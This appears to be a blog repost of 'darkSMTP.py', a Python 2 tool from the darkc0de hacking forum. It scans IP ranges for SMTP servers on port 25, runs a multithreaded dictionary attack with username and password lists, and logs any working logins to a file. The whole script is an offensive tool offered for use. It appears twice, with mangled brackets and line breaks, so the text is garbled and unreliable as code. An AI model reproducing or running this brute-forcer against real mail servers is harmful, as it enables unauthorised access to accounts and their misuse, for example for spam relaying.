#!/usr/bin/python -O
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
#
# darkSMTP.py c0ded by mr_me
#
# The multithreaded SMTP scanner
# Takes a list of ips like:
#
# 91.121.248.72
# 91.121.248.73
# 91.121.248.74
# 91.121.248.75
# 91.121.248.76
# 91.121.248.77
# 91.121.248.78
#
# ----snip----
#
import threading, time, random, sys, smtplib, socket
from smtplib import SMTP
from copy import copy
from optparse import OptionParser
usage= "./%prog -i <iplist> -t <threads> -u <userlist> -p <passlist>" usage = usage+"\nExample: ./%prog -i ips.txt -t 8 -u user.txt -p pass.txt" parser = OptionParser(usage=usage) parser.add_option("-i",
action="store", dest="ips",
help="IP list for scanning") parser.add_option("-t", type="int",
action="store", dest="threads",
help="Threads for processing") parser.add_option("-u",
action="store", dest="users",
help="List of usernames") parser.add_option("-p",
action="store", dest="passes",
help="List of passwords")
(options, args) = parser.parse_args()
def banner():
print "\n|----------------------------------------------------|"
print "| _ |"
print "| ____ __| |_ _ __ ___ __ __ _ _ _ _ _ ___ _ _ |"
print "| (_-< ' \ _| '_ \ (_-</ _/ _` | ' \| ' \/ -_) '_| |"
print "| /__/_|_|_\__| .__/ /__/\__\__,_|_||_|_||_\___|_| |"
print "| |_| |"
print "|----------------------------------------------------|"
print "| +-+-+ +-+-+-+-+-+ |"
print "| |b|y| |m|r|_|m|e| Greetz: d3hydr8 & |"
print "| +-+-+ +-+-+-+-+-+ the darkc0de crew |"
print "|----------------------------------------------------|\n"
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) != 9:
banner()
parser.print_help()
sys.exit(1)
i = 1
port = 25
threads = options.threads
file = options.ips
users = options.users
passes = options.passes
completed = ***91;***93; threaders = ***91;***93; logger = open('darkSMTP.txt','w') ipfile = open(file,'r') banner()
print "***91;+***93; Warming up...ok"; lines = ipfile.readlines()
print "***91;+***93; IP's loaded:",len(lines);
print "***91;+***93; Users loaded:",len(users)
print "***91;+***93; Passwords loaded:",len(passes) ipfile.close(); eachThread = len(lines) / int(threads);
print "***91;+***93; IP's per thread:",eachThread;
class myThread (threading.Thread):
def __init__(self, threadID, name, counter):
self.threadID = threadID
self.name = name
self.counter = counter
threading.Thread.__init__(self)
def run(self):
print "***91;+***93; Starting " + self.name
connect(self.name, self.counter, eachThread, self.threadID)
def connect(threadName, delay, counter, threadID):
start = threadID * counter
file = open(options.ips,'r')
data = file.readlines()
while counter:
if 0:
thread.exit()
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(2)
try:
connect=s.connect((data***91;start-counter***93;,port))
print "***91;+***93; SMTP server on: " + data***91;start-counter***93;,
print "***91;+***93; Server added to output file!"
logger.write(data***91;start-counter***93;)
if s.recv(1024):
completed.append(data***91;start-counter***93;.rstrip())
except socket.timeout:
print "***91;-***93; Server non-existant: " + data***91;start-counter***93;.rstrip()
except socket.error:
print "***91;+***93; Server exists! " + data***91;start-counter***93;.rstrip();
print "***91;-***93; But it's not SMTP"
s.close()
time.sleep(delay)
counter -= 1
while (i < int(threads + 1)):
thread = myThread(i, "Thread " + str(i), i);
threaders.append(thread)
i += 1
thread.start()
for t in threaders:
t.join()
print "\n--- Found & logged all SMTP servers in range ---\n" print "---------------------------------------------------" print "***91;+***93; Starting dictionary attack for each SMTP server" print "---------------------------------------------------\n"
# d3hydr8, I love your c0de bro ;)
try:
helo = smtplib.SMTP(sys.argv***91;1***93;)
name = helo.helo()
helo.quit() except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
name = "***91;-***93; Server doesn't support the Helo cmd"
try:
users = open(users, "r").readlines() except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(passes, "r").readlines() except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
wordlist = copy(words) def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value***91;0***93;)
else:
reloader()
value = random.sample(words, 1)
words.remove(value***91;0***93;)
users.remove(users***91;0***93;)
lock.release()
return value***91;0***93;***91;:-1***93;, users***91;0***93;***91;:-1***93;
class Worker(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
value, user = getword()
for ip in completed:
print "-"*12
print "***91;+***93; IP: "+ip
try:
print "User:",user,"Password:",value
smtp = smtplib.SMTP(ip)
smtp.login(user, value)
print "\t\n***91;!***93; Login successful:",user, value
logger.write("***91;!***93; Found: " + ip + " " + str(user) + ":" + str(value) + "\n")
smtp.quit()
sys.exit(2)
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
threaders.append(work)
time.sleep(1)
for t in threaders:
t.join()
logger.close()
print "\n***91;!***93; Dont forget to check darkSMTP.txt" print "***91;!***93; Ended at: " + timer() + "\n"
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
#
# darkSMTP.py c0ded by mr_me
#
# The multithreaded SMTP scanner
# Takes a list of ips like:
#
# 91.121.248.72
# 91.121.248.73
# 91.121.248.74
# 91.121.248.75
# 91.121.248.76
# 91.121.248.77
# 91.121.248.78
#
# ----snip----
#
import threading, time, random, sys, smtplib, socket
from smtplib import SMTP
from copy import copy
from optparse import OptionParser
usage= "./%prog -i <iplist> -t <threads> -u <userlist> -p <passlist>" usage = usage+"\nExample: ./%prog -i ips.txt -t 8 -u user.txt -p pass.txt" parser = OptionParser(usage=usage) parser.add_option("-i",
action="store", dest="ips",
help="IP list for scanning") parser.add_option("-t", type="int",
action="store", dest="threads",
help="Threads for processing") parser.add_option("-u",
action="store", dest="users",
help="List of usernames") parser.add_option("-p",
action="store", dest="passes",
help="List of passwords")
(options, args) = parser.parse_args()
def banner():
print "\n|----------------------------------------------------|"
print "| _ |"
print "| ____ __| |_ _ __ ___ __ __ _ _ _ _ _ ___ _ _ |"
print "| (_-< ' \ _| '_ \ (_-</ _/ _` | ' \| ' \/ -_) '_| |"
print "| /__/_|_|_\__| .__/ /__/\__\__,_|_||_|_||_\___|_| |"
print "| |_| |"
print "|----------------------------------------------------|"
print "| +-+-+ +-+-+-+-+-+ |"
print "| |b|y| |m|r|_|m|e| Greetz: d3hydr8 & |"
print "| +-+-+ +-+-+-+-+-+ the darkc0de crew |"
print "|----------------------------------------------------|\n"
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) != 9:
banner()
parser.print_help()
sys.exit(1)
i = 1
port = 25
threads = options.threads
file = options.ips
users = options.users
passes = options.passes
completed = ***91;***93; threaders = ***91;***93; logger = open('darkSMTP.txt','w') ipfile = open(file,'r') banner()
print "***91;+***93; Warming up...ok"; lines = ipfile.readlines()
print "***91;+***93; IP's loaded:",len(lines);
print "***91;+***93; Users loaded:",len(users)
print "***91;+***93; Passwords loaded:",len(passes) ipfile.close(); eachThread = len(lines) / int(threads);
print "***91;+***93; IP's per thread:",eachThread;
class myThread (threading.Thread):
def __init__(self, threadID, name, counter):
self.threadID = threadID
self.name = name
self.counter = counter
threading.Thread.__init__(self)
def run(self):
print "***91;+***93; Starting " + self.name
connect(self.name, self.counter, eachThread, self.threadID)
def connect(threadName, delay, counter, threadID):
start = threadID * counter
file = open(options.ips,'r')
data = file.readlines()
while counter:
if 0:
thread.exit()
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(2)
try:
connect=s.connect((data***91;start-counter***93;,port))
print "***91;+***93; SMTP server on: " + data***91;start-counter***93;,
print "***91;+***93; Server added to output file!"
logger.write(data***91;start-counter***93;)
if s.recv(1024):
completed.append(data***91;start-counter***93;.rstrip())
except socket.timeout:
print "***91;-***93; Server non-existant: " + data***91;start-counter***93;.rstrip()
except socket.error:
print "***91;+***93; Server exists! " + data***91;start-counter***93;.rstrip();
print "***91;-***93; But it's not SMTP"
s.close()
time.sleep(delay)
counter -= 1
while (i < int(threads + 1)):
thread = myThread(i, "Thread " + str(i), i);
threaders.append(thread)
i += 1
thread.start()
for t in threaders:
t.join()
print "\n--- Found & logged all SMTP servers in range ---\n" print "---------------------------------------------------" print "***91;+***93; Starting dictionary attack for each SMTP server" print "---------------------------------------------------\n"
# d3hydr8, I love your c0de bro ;)
try:
helo = smtplib.SMTP(sys.argv***91;1***93;)
name = helo.helo()
helo.quit() except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
name = "***91;-***93; Server doesn't support the Helo cmd"
try:
users = open(users, "r").readlines() except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(passes, "r").readlines() except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
wordlist = copy(words) def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value***91;0***93;)
else:
reloader()
value = random.sample(words, 1)
words.remove(value***91;0***93;)
users.remove(users***91;0***93;)
lock.release()
return value***91;0***93;***91;:-1***93;, users***91;0***93;***91;:-1***93;
class Worker(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
value, user = getword()
for ip in completed:
print "-"*12
print "***91;+***93; IP: "+ip
try:
print "User:",user,"Password:",value
smtp = smtplib.SMTP(ip)
smtp.login(user, value)
print "\t\n***91;!***93; Login successful:",user, value
logger.write("***91;!***93; Found: " + ip + " " + str(user) + ":" + str(value) + "\n")
smtp.quit()
sys.exit(2)
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
threaders.append(work)
time.sleep(1)
for t in threaders:
t.join()
logger.close()
print "\n***91;!***93; Dont forget to check darkSMTP.txt" print "***91;!***93; Ended at: " + timer() + "\n"
0 Comments:
Post a Comment